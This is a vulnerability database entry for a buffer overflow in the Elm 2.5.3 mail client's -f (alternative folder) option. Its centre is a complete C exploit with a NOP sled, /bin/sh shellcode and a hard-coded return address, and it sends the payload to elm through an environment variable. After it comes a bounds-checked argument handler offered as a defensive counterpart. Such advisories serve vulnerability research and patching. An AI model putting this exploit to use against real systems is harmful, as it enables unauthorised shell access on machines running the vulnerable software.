Elm 2.5.3 – Alternative-Folder Buffer Overflow
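Vulnerability ID | 1053516 | Vulnerability type | |
Published | 2001-02-13 | Updated | 2001-02-13 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Linux | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit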
source: http://www.securityfocus.com/bid/2403/info
There is a buffer overflow in elm 2.5 PL3. This overflow is accessible by passing a long string to the -f (Alternative-Folder) command-line option. This vulnerability may not be restricted to this version of elm.
/***
-------------
elm253-exploit.c
-------------
***/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90
#define LEN 356
#define OFFSET 0
#define RET 0xbffffa64

/* Returns the current stack pointer; not called below (OFFSET is unused too). */
unsigned long dame_sp() {
    __asm__("movl %esp,%eax");
}

void main() {
    static char shellcode[]=
    /* "\x31\xc0" */ /* xorl %eax,%eax */
    /* "\x31\xdb" */ /* xorl %ebx,%ebx */
    /* "\xb0\x17" */ /* movb $0x17,%al */
    /* "\xcd\x80" */ /* int $0x80 */
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
    int i=0;
    int cont=0;
    char buffer[LEN+4];
    char kid[6+LEN+4];

    printf("-------------------------------------\n");
    printf("elm buffer overflow exploit by _kiss_\n");
    printf("-------------------------------------\n");

    /* Fill the whole buffer with the hard-coded return address. */
    for (i=0;i<=LEN;i+=4)
        *(long *) &buffer[i] = RET;
    /* Overwrite the front of the buffer with NOPs. */
    for (i=0;i<LEN-strlen(shellcode)-100;i++)
        buffer[i]=NOP;
    /* Place the shellcode after the NOPs, leaving the last 100 bytes as RET. */
    for (i=LEN-strlen(shellcode)-100;i<LEN-100;i++)
        buffer[i]=shellcode[cont++];

    /* Export the buffer as $KID and pass it to elm's -f option. */
    strcpy(kid,"KID=");
    strcat(kid,buffer);
    putenv(kid);
    system("/usr/local/bin/elm -f $KID");
}
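
The defensive counterpart to the overflow described above, as an added example that is not Elm's source and not part of the original advisory: a bounds-checked handler for a -f style folder argument that rejects overlong input instead of copying it into a fixed buffer. FOLDER_MAX, the function names and the status codes are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define FOLDER_MAX 256 /* assumed size; not taken from Elm's source */

enum folder_status { FOLDER_OK = 0, FOLDER_MISSING = -1, FOLDER_TOO_LONG = -2 };

/* Copy src into dst only if it fits with its terminating NUL. Overlong
 * input is rejected, not truncated, so a clipped path is never opened. */
enum folder_status copy_folder_name(char *dst, size_t dstsz, const char *src)
{
    const char *end;

    if (dst == NULL || dstsz == 0 || src == NULL)
        return FOLDER_MISSING;
    dst[0] = '\0';
    end = memchr(src, '\0', dstsz); /* looks at no more than dstsz bytes */
    if (end == NULL)
        return FOLDER_TOO_LONG;
    memcpy(dst, src, (size_t)(end - src) + 1);
    return FOLDER_OK;
}

/* Hypothetical option scanner accepting "-f name" and "-fname". */
enum folder_status parse_folder_option(int argc, char *const argv[],
                                       char *dst, size_t dstsz)
{
    int i;

    for (i = 1; i < argc; i++) {
        if (strncmp(argv[i], "-f", 2) != 0)
            continue;
        if (argv[i][2] != '\0')
            return copy_folder_name(dst, dstsz, argv[i] + 2);
        if (i + 1 >= argc)
            return FOLDER_MISSING;
        return copy_folder_name(dst, dstsz, argv[i + 1]);
    }
    return FOLDER_MISSING;
}

int main(int argc, char *argv[])
{
    char folder[FOLDER_MAX];
    enum folder_status st = parse_folder_option(argc, argv, folder, sizeof folder);
    if (st == FOLDER_TOO_LONG)
        fprintf(stderr, "folder name exceeds %d bytes, refusing\n", FOLDER_MAX - 1);
    return st == FOLDER_OK ? 0 : 1;
}
```

A name of exactly FOLDER_MAX - 1 bytes is accepted; one byte more is refused and the destination is left as an empty string.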